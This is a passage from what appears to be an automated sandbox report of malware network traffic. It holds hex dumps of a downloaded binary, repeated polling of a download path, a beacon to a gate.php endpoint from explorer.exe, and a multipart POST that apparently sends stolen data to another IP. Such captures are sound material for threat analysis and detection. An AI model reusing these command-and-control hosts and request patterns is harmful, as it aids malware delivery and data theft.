                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk*~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<*Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEP*OuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q*)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~|jbK!N7R}T2bsq1L^!|qD'sLnD@bn%0=bQ1+lQXO|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.587268114 CET224INData Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f
                                                                                                                                                                                                                                                                                        Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(ucc
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.587297916 CET1236INData Raw: f9 ad 67 76 17 ac ab 0b db 40 d6 4d bb cd 29 6e a5 f1 4c c0 34 97 4f a7 0e ef fc 69 77 78 64 69 c1 97 d8 e5 76 6d 29 51 42 65 a8 c4 f5 a2 34 c7 ba 35 61 41 aa 57 a4 b7 cf 8b 03 c3 a3 26 de 8a 41 ec 05 e5 7f c7 58 21 a7 f2 0c 7b c0 5b 44 1a 6d 43
                                                                                                                                                                                                                                                                                        Data Ascii: gv@M)nL4Oiwxdivm)QBe45aAW&AX!{[DmC(^_iPUrl9L"?2Z,+V:R&!HJqa&uv5"+o%P4@.vgAY#i?_$J8sQ^I#sn`G}HC
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.587327957 CET1236INData Raw: b8 96 c1 6b 69 27 5c ee c7 f9 89 a8 9e 4c 34 d5 75 9d fe 61 ca 18 4d 6f 0d 99 bc 16 23 4a 4b fb 31 9f 78 59 bb 31 c6 42 c1 b8 db d8 d2 09 84 0e 37 cd 9f 81 56 19 9f 47 ef 83 60 3c 07 f7 1b 6f 60 ce ba f3 16 fe 3c 27 3e b4 51 bc dc c3 26 bf 0f df
                                                                                                                                                                                                                                                                                        Data Ascii: ki'\L4uaMo#JK1xY1B7VG`<o`<'>Q&Md42R32zD4:6vaG3~}safF4d|a.V6.qz$C'^Y'=C]YA'6mo@{# }YniEVoD"8*k;
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.587347031 CET1236INData Raw: 9b 84 b6 11 05 74 f4 6a 29 ea 95 12 3e 4e c6 5d 07 8a 8c 6e 0a 29 df c0 d0 dc 61 4a f2 87 c7 57 b7 17 8a ec 0d 94 4d 28 cc 70 af e6 39 a5 16 63 ea 3d 97 af a2 e0 b5 f0 4d db 26 a7 ce 90 e4 a4 5d c2 5d 0e 75 5a 74 b9 53 4e 57 3f b4 a7 76 c9 b2 72
                                                                                                                                                                                                                                                                                        Data Ascii: tj)>N]n)aJWM(p9c=M&]]uZtSNW?vr>o+X<T<RvNdl:b=l{bK)06(]LiR(:'hbJ5}V78t4L7xqmFJ-rBCk1^u^Xe@bZ@%
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.587353945 CET672INData Raw: 6c 07 1d c8 11 25 f2 1f 74 2d 83 1a ee 39 18 27 11 d8 19 a1 b5 bf 10 bd df 8b f4 fe 95 f6 97 67 5c 9b d1 1d 4d d2 1e e3 96 dc 44 87 9c e7 63 6c 14 6e 5a 9a 91 48 6d 6f 1d 74 74 9b 44 bc c1 38 4d d4 a2 a2 0b 5a 13 86 e8 70 1a 44 98 8f 4a ec 16 e7
                                                                                                                                                                                                                                                                                        Data Ascii: l%t-9'g\MDclnZHmottD8MZpDJ$ERJW'\VQMf.5gs6YQK-<2s{BSP|@M;l%&\~LIOk{1X4/bMMMw /c)F1{FsI`Fa7^2z
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.587361097 CET1236INData Raw: e6 69 2d 49 51 f3 a4 d5 76 b0 82 cf 74 d1 85 19 f7 42 a9 78 eb 0b e9 01 32 e4 1d 91 61 e4 92 ad 68 8b f1 01 d1 83 62 ef 0e ea 87 d8 a0 66 e2 ec 6d df dc 97 39 57 94 e3 66 5a 2b 20 d1 43 cd 8a 07 04 20 9b 76 db 4c a6 9b 12 b9 0c 46 0b 2e ee 08 fc
                                                                                                                                                                                                                                                                                        Data Ascii: i-IQvtBx2ahbfm9WfZ+ C vLF.CXb<SK(R?X.!:YjJD^J[,x)<"kp /uTW56"An*M%b"P{$T#/6UC{XQ;,>=
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.587368011 CET1236INData Raw: df fc 63 59 94 94 22 2e 6e b1 dd f8 1b 24 0c 47 af 41 b3 94 25 ae 63 05 68 cb 3a 78 6c 3a e6 0d fb 89 7f 8a 63 45 33 22 3e 37 2f cf bc bf dc 07 94 6d 6c 26 9b 2d c4 5a 8b a4 95 2b 63 98 62 c1 cf a5 66 8f c2 9e 15 af 99 71 41 93 5a 45 26 fd cf ad
                                                                                                                                                                                                                                                                                        Data Ascii: cY".n$GA%ch:xl:cE3">7/ml&-Z+cbfqAZE&j;{1:w\1`gub%gi&!3h+bn,awiHeKQZXrU)DT"->KTgx;1xY6#'BsZy
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.595438004 CET1236INData Raw: ab 83 12 71 60 ef ac 34 32 d8 70 30 3b 55 9a 12 0e 9f 26 6c be 1f b1 56 29 68 86 1f 1c a5 97 2c 74 ca 37 9a 6a 55 f9 be e3 48 f7 00 72 6f 42 12 41 ec 23 16 2d cd d2 bf 20 52 76 63 2b 78 75 0d b1 13 ba b8 e6 b9 b1 8c 54 24 79 51 3b b2 29 1b ba 44
                                                                                                                                                                                                                                                                                        Data Ascii: q`42p0;U&lV)h,t7jUHroBA#- Rvc+xuT$yQ;)D<1:XRE^7ipg/]BYZ*e'0ZiU4Nk+@V,E*#LQ$iT{}@zFA8F /7B@57ARN"lU^-
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.595602036 CET1236INData Raw: 2b ed b6 90 93 b5 cb e9 5b 81 d3 0a ac cd 19 0a b7 db 61 4d 90 7d 85 3c 51 38 f9 08 b0 8a 2c 52 5c 3b a3 28 21 b4 b3 8b 95 1d cf 79 a5 e6 17 de 83 a8 dd 37 7c d0 40 73 1a 93 09 91 ed df 13 89 28 1d 8a d0 67 8b 19 59 81 4b 0b 18 94 db ad 26 01 9f
                                                                                                                                                                                                                                                                                        Data Ascii: +[aM}<Q8,R\;(!y7|@s(gYK&&nB<H3Qh-`uK^TG{cKiF{R_y|w.y0Pc-:gZdSw^P;$)SL'3{y
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.604770899 CET1236INData Raw: 54 e5 fd b2 c6 83 f0 18 cc 3c bb a5 89 7b 89 54 98 d8 15 a6 fa 49 a4 67 d0 03 82 eb c7 42 29 b9 76 f8 01 5c 2b 20 0a 5c 1d 33 83 13 83 42 79 3d 7e c9 17 b3 a3 51 aa c8 b6 32 7d 48 b8 ad f1 c2 7d 0a 69 9d c2 d2 7a 9b 73 02 47 89 ff 76 3e 73 48 a6
                                                                                                                                                                                                                                                                                        Data Ascii: T<{TIgB)v\+ \3By=~Q2}H}izsGv>sH4w3*gWM|E j;zq{1"7:ZSe%%_d6YLVl]Rk&06B>lJk(:OB+8aQ$Mnwka{
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:08.578466892 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                                                        User-Agent: C
                                                                                                                                                                                                                                                                                        Host: 80.82.65.70
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:09.066426039 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:08 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:11.490015030 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                                                        User-Agent: C
                                                                                                                                                                                                                                                                                        Host: 80.82.65.70
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:11.982053041 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:11 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:14.240731955 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                                                        User-Agent: C
                                                                                                                                                                                                                                                                                        Host: 80.82.65.70
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:14.732685089 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:14 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:16.971389055 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                                                        User-Agent: C
                                                                                                                                                                                                                                                                                        Host: 80.82.65.70
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:17.461582899 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:17 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=94
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:19.718420029 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                                                        User-Agent: C
                                                                                                                                                                                                                                                                                        Host: 80.82.65.70
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:20.293880939 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:19 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=93
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:22.478904009 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                                                        User-Agent: C
                                                                                                                                                                                                                                                                                        Host: 80.82.65.70
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:22.980348110 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:22 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=92
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:26.519911051 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                                                        User-Agent: C
                                                                                                                                                                                                                                                                                        Host: 80.82.65.70
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:27.010283947 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:26 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=91
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:29.391504049 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                                                        User-Agent: C
                                                                                                                                                                                                                                                                                        Host: 80.82.65.70
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:29.879004002 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:29 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=90
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:32.257066965 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                                                        User-Agent: C
                                                                                                                                                                                                                                                                                        Host: 80.82.65.70
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:32.746566057 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:32 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=89
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:34.843843937 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                                                        User-Agent: C
                                                                                                                                                                                                                                                                                        Host: 80.82.65.70
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:35.337614059 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:35 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=88
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:37.433306932 CET393OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                                                        User-Agent: C
                                                                                                                                                                                                                                                                                        Host: 80.82.65.70
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:37.953541994 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:37 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 1
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=87
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        30192.168.2.1050021185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:05.087802887 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:05.207591057 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:06.857609987 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:05 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        31192.168.2.1050024185.215.113.206807020C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:05.760761023 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.093167067 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:06 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:07.265218019 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGC
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 211
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
